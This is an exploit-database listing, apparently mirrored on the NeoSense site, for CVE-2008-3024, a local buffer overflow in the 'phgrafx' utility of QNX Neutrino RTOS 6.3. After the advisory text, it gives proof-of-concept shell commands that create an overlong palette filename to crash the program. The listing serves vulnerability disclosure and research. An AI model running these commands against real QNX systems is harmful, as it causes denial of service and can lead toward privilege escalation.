[] NeoSense
E X P L O I T S
title author type platform port cve id

QNX Neutrino RTOS 6.3 - 'phgrafx' Local Buffer Overflow

Author: Filipe Balestra
type: dos
platform: unix
port: nan
date_added: 2008-07-01 
date_updated: 2014-03-02 
verified: 1 
codes: CVE-2008-3024;OSVDB-46652 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/30024/info

QNX Neutrino RTOS is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. This issue affects the 'phgrafx' utility.

Attackers can exploit this issue to execute arbitrary code with superuser privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts will result in a denial of service.

QNX Neutrino RTOS 6.3.2 and 6.3.0 are vulnerable; other versions may be affected as well.

# PHOTON_PATH=/tmp
# cd /tmp
# mkdir palette
# cd palette
# touch `perl -e 'print "A" x 290 . ".pal"'`
# /usr/photon/bin/phgrafx
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.